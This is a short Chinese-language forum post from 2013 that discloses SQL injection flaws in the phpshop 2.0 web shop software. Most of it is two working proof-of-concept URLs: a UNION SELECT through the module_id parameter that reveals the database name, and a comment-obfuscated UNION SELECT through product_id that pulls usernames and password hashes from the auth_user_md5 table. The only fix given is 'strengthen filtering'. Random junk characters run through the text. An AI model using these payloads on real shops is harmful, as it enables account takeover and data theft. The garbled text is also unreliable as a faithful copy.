标题 : phpshop 2.0 SQL Injection Vulnerability. d7 V, N* Y$ o+ K5 o1 z* R+ t. b
; h7 S* T+ ^+ s. v) |作者 : By onestree9 P' `/ G# H9 ?
下载地址 : http://code.google.com/p/phpshop/downloads/list
1 K* Z* _# O# o; `7 A+ \3 w测试地址: windows 7 / ubuntu
% n4 Y0 ~; ~ b/ @- ]6 O) m! N8 k
3 L& B7 c8 A2 M % B" ^ F, F( u+ t/ N3 W% a: y5 O
SQLi p0c:
5 p4 s* D, T5 N+ O$ ^( D2 P& n W5 H8 ~
2 n' G' b; \$ S==================) z$ B1 v7 q" d2 t# c R6 x0 P( t
0 j7 X6 I' L+ s
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'9 k$ w5 c) r' [4 y+ W' W; e
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
. t+ r/ L7 z. ~) h6 ~ % G9 I) |* L* d
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--( e; j8 ]1 F$ Y
: `4 e% I$ G. {2 Z" L
修复:" s+ Q% y, b: a k
加强过滤; f2 ~& B+ J9 }" ]
: u4 Y$ w3 n# b. p/ b5 C! e6 L
j" z5 H3 h5 y |
发表于 2013-1-18 18:24:10
收藏
支持
反对